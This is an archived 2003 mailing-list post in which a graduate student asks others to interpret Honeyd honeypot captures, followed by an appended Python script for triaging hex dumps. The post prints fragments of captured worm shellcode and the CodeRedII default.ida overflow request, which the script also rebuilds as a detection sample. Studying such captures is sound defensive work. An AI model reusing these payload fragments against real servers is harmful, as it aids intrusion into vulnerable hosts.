Security Basics mailing list archives

Need Help


From: Pat Garlick <patlg1 () netzero net>
Date: 19 Aug 2003 06:01:41 -0000



Hello:

I have some captured files from a Honeyd that was in operation back in 
May-June of this year.  I launched this Honeyd as part of my Graduate 
Studies Project.  The one thing that occurred frequently on this box was 
the attempted launch of a CodeRedII worm and buffer overflows.

In these files is some other activity that I am not proficient enough to 
decipher.  I am making some guesses that there was loading of files going 
on.  I am posting this to find out if someone in this users' group would 
be able to adequately provide information.  I will be adding it to the 
paper that I have to write and I want to be as accurate as possible.  If 
there is another users' group that I should be submitting this to, let me 
know that as well.

I have pasted a small portion of one of the captured files below. If it 
doesn't come through or is jumbled, let me know how I can submit it. I 
look forward to hearing soon from whoever can help with this. 
Thanks much, Pat.

This was converted in a Hex Editor to text and binary.

54 0B 78 03 00 00 42 0C 00 3C 03 4B 45 52 4E 75  T.x...B..<.KERNu
00 00 7C 03 04 45 4C 33 32 75 00 33 00 49 00 72  ..|..EL32u.3.I.r
20 03 00 00 41 00 00 3C 03 47 65 74 50 75 00 00   ...A..<.GetPu..
7C 03 04 72 6F 63 41 75 00 03 4A 10 49 00 00 03  |..rocAu..J.I...
4A 24 0F 00 0C 0B 00 00 02 03 4A 1C 00 04 0B 03  J$........J.....
00 00 44 24 24 64 67 00 06 00 00 58 61 00 00 51  ..D$$dg....Xa..Q
00 00 00 00 5D 00 00 45 00 00 0D 00 00 00 4C 6F  ....]..E......Lo
61 64 4C 69 62 72 61 72 79 41 00 00 75 00 00 55  adLibraryA..u..U
00 00 45 00 00 0D 00 00 00 43 72 65 61 74 65 54  ..E......CreateT
68 72 65 61 64 00 00 75 00 00 55 00 00 45 00 00  hread..u..U..E..
0D 00 00 00 47 65 74 54 69 63 6B 43 6F 75 6E 74  ....GetTickCount
00 00 75 00 00 55 00 00 45 00 00 06 00 00 00 53  ..u..U..E......S
6C 65 65 70 00 00 75 00 00 55 00 00 45 00 00 17  leep..u..U..E...
00 00 00 47 65 74 53 79 73 74 65 6D 44 65 66 61  ...GetSystemDefa
75 6C 74 4C 61 6E 67 49 44 00 00 75 00 00 55 00  ultLangID..u..U.
00 45 00 00 14 00 00 00 47 65 74 53 79 73 74 65  .E......GetSyste
6D 44 69 72 65 63 74 6F 72 79 41 00 00 75 00 00  mDirectoryA..u..
55 00 00 45 00 00 0A 00 00 00 43 6F 70 79 46 69  U..E......CopyFi
6C 65 41 00 00 75 00 00 55 00 00 45 00 00 10 00  leA..u..U..E....
00 00 47 6C 6F 62 61 6C 46 69 6E 64 41 74 6F 6D  ..GlobalFindAtom
41 00 00 75 00 00 55 00 00 45 00 00 0F 00 00 00  A..u..U..E......
47 6C 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 00  GlobalAddAtomA..
75 00 00 55 00 00 45 00 00 0C 00 00 00 43 6C 6F  u..U..E......Clo
73 65 48 61 6E 64 6C 65 00 00 75 00 00 55 00 00  seHandle..u..U..
45 00 00 08 00 00 00 5F 6C 63 72 65 61 74 00 00  E......_lcreat..
75 00 00 55 00 00 45 00 00 08 00 00 00 5F 6C 77  u..U..E......_lw
72 69 74 65 00 00 75 00 00 55 00 00 45 00 00 08  rite..u..U..E...
00 00 00 5F 6C 63 6C 6F 73 65 00 00 75 00 00 55  ..._lclose..u..U
00 00 45 00 00 0E 00 00 00 47 65 74 53 79 73 74  ..E......GetSyst
65 6D 54 69 6D 65 00 00 75 00 00 55 00 00 45 00  emTime..u..U..E.
00 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00  .....WS2_32.DLL.
00 55 00 46 00 3E 44 00 05 00 36 00 00 00 36 00  .U.F.>D...6...6.
00 00 00 06 25 5D 00 19 00 00 00 5F 00 2D 08 00  ....%]....._.-..

2">..</he...>\...6...6.....%]....._.-..E..(.l..@..\....DUhB.P.q.
..X..~.P.>..T..ad>....<script> ..function Homepage(){..<!--..// 
in real bits, urls get returned to our script like this:..// res
://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm ...../
/For testing use DocURL = "res://shdocvw.dll/http_404.htm#https:
//www.microsoft.com/bar.htm"...DocURL = document.URL;.......//th
is is where the http or https will be, as found by searching for
 :// but skipping the res://...protocolIndex=DocURL.indexOf("://
",4);......//this finds the ending slash for the domain server .
..serverIndex=D...>....6...6.....%]....._.-..E..(.m..@..[....DUh

........h...B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGet
Tf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B
....=U..Qt.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.
P........<a...E...@...........).......E.j..E.P1.Qf..x.Q.E.P.E.P.

This occurred just before the launch of the CodeRedII worm, a buffer 
overflow. I would like to know what is going on with \CMD.EXE and 
d:\inetpub\scripts\root.exe.  What is that file?


.@..d..GET/default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
=a  HTTP/1.0..Content-type: text/xml.Content-length: 3379 ......
..`........dg.6..dg.&.......h......\...P.U...\...P.U..@.....X...
.\........\CMD.EXE.^.....cj......d:\inetpub\scripts\root.exe...$
....\...P.U...>?I..6...6.....%]....._.-..E..(....@.......DUhB.P.
V.;.I.QuZP.>.$u.....>....N...N......_.-..%]....E..@.K@.j..dDUhB.
....V.P.QuZ.;.IP.@.#...bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%
u0000%u00=a  HTTP/1.0..Content-type: text/xml.Content-length: 3379 

One last portion below:

00 00 42 00 0E 01 01 01 01 01 01 01 70 00 42 01  ..B.........p.B.
70 00 42 00 00 00 00 00 00 00 00 68 00 00 00 42  p.B........h...B
00 01 01 01 01 31 00 00 18 50 00 00 35 01 01 01  .....1...P..5...
05 50 00 00 51 68 2E 64 6C 6C 68 65 6C 33 32 68  .P..Qh.dllhel32h
6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 43 68  kernQhounthickCh
47 65 74 54 66 00 6C 6C 51 68 33 32 2E 64 68 77  GetTf.llQh32.dhw
73 32 5F 66 00 65 74 51 68 73 6F 63 6B 66 00 74  s2_f.etQhsockf.t
6F 51 68 73 65 6E 64 00 18 10 00 42 00 45 00 50  oQhsend....B.E.P
00 16 50 00 45 00 50 00 45 00 50 00 16 50 00 10  ..P.E.P.E.P..P..
10 00 42 00 1E 00 03 3D 55 00 00 51 74 05 00 1C  ..B....=U..Qt...
10 00 42 00 16 00 00 31 00 51 51 50 00 00 03 01  ..B....1.QQP....
04 00 00 00 01 01 01 01 51 00 45 00 50 00 45 00  ........Q.E.P.E.
50 00 16 6A 11 6A 02 6A 02 00 00 50 00 45 00 50  P..j.j.j...P.E.P
00 45 00 50 00 16 00 00 09 00 00 00 3C 61 00 00  .E.P........<a..
00 45 00 00 0C 40 00 14 00 00 00 04 01 00 00 00  .E...@..........
08 29 00 00 04 00 01 00 00 45 00 6A 10 00 45 00  .).......E.j..E.
50 31 00 51 66 00 00 78 01 51 00 45 03 50 00 45  P1.Qf..x.Q.E.P.E
00 50 00 00 00 00 00 13 00 3E 77 00 0D 00 72 01  .P.......>w...r.
00 00 72 01 00 00 00 06 25 5D 00 19 00 00 00 5F  ..r.....%]....._
00 2D 08 00 45 00 01 64 00 6B 40 00 00 01 35 00  .-..E..d.k@...5.

B........h...B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGe
tTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....
B....=U..Qt.....B....1.QQP............Q.E.P.E.P..j.j.j..-..>.{..

I found out that Q.E.P.E.P is really a web link.  There are several web 
links in all of the captured files with strange names.
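The dumps above are hex-editor output: sixteen hex bytes per line followed by an ASCII column. The usual first triage step on such a capture is to recover the raw bytes, list the printable strings in them (which is how the Win32 import names such as LoadLibraryA, CreateThread and WS2_32.DLL surface), and match the HTTP request against the well-known CodeRedII probe pattern visible in the post (GET /default.ida? followed by a long run of X and %uXXXX escapes). The script below is an added example written for this thread, not code from the original post; the dump lines in SAMPLE_DUMP are excerpted from the post, and SAMPLE_REQUEST is a constructed, single-line version of the request fragment that the mail client wrapped across several lines.

```python
"""Triage helpers for a hex-editor dump of a Honeyd capture.

Added example for this thread (not from the original post). Assumes the
hex-editor layout shown in the post: up to 16 hex bytes per line, then an
ASCII column that must be ignored when recovering the data.
"""
import re

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")

# Excerpt of the post's own dump (LoadLibraryA / CreateThread / WS2_32.DLL region).
SAMPLE_DUMP = """\
00 00 00 00 5D 00 00 45 00 00 0D 00 00 00 4C 6F  ....]..E......Lo
61 64 4C 69 62 72 61 72 79 41 00 00 75 00 00 55  adLibraryA..u..U
00 00 45 00 00 0D 00 00 00 43 72 65 61 74 65 54  ..E......CreateT
68 72 65 61 64 00 00 75 00 00 55 00 00 45 00 00  hread..u..U..E..
00 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00  .....WS2_32.DLL.
"""

# Constructed single-line version of the request fragment quoted in the post
# (the mail client wrapped the original across several lines).
SAMPLE_REQUEST = (
    b"GET /default.ida?" + b"X" * 224
    + b"%u9090%u6858%ucbd3%u7801" * 3
    + b"%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00"
    + b"=a  HTTP/1.0\r\nContent-type: text/xml\r\nContent-length: 3379\r\n\r\n"
)


def parse_hex_dump(text, bytes_per_line=16):
    """Recover raw bytes from hex-editor output.

    Only the leading run of two-character hex tokens on each line is used,
    capped at bytes_per_line, so the ASCII column is never mistaken for data
    even when it begins with hex-looking letters such as "ad" in "adLibraryA".
    """
    out = bytearray()
    for line in text.splitlines():
        taken = 0
        for tok in line.split():
            if taken == bytes_per_line or not HEX_PAIR.match(tok):
                break
            out.append(int(tok, 16))
            taken += 1
    return bytes(out)


def printable_strings(data, min_len=4):
    """Runs of printable ASCII, the same idea as the Unix `strings` tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


# CodeRedII probe as it appears in the post: default.ida, X padding, %u escapes.
CODE_RED_II = re.compile(rb"GET\s*/default\.ida\?(X{32,})((?:%u[0-9A-Fa-f]{4})+)")


def decode_percent_u(escaped):
    """Decode IIS-style %uXXXX escapes into the little-endian byte pairs the
    server would have seen (%u9090 -> 90 90)."""
    out = bytearray()
    for hexval in re.findall(rb"%u([0-9A-Fa-f]{4})", escaped):
        out += int(hexval, 16).to_bytes(2, "little")
    return bytes(out)


def detect_code_red_ii(data):
    """Return a summary dict when the capture holds the CodeRedII request,
    otherwise None. nop_like_bytes counts 0x90 bytes in the decoded escapes,
    a crude sled indicator that is useful for triage, not proof."""
    m = CODE_RED_II.search(data)
    if not m:
        return None
    decoded = decode_percent_u(m.group(2))
    return {
        "x_run": len(m.group(1)),
        "escape_count": len(decoded) // 2,
        "nop_like_bytes": decoded.count(0x90),
    }


if __name__ == "__main__":
    raw = parse_hex_dump(SAMPLE_DUMP)
    print(len(raw), "bytes recovered")
    print("strings:", printable_strings(raw))
    print("CodeRedII:", detect_code_red_ii(SAMPLE_REQUEST))
```

Running the script against the full dumps in the post (paste them into a file and feed it to parse_hex_dump) lists the imported API names in order, which is the quickest way to see what the dropped code is able to do: load libraries, create threads, read the system directory, copy a file, and open a socket via WS2_32.DLL.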








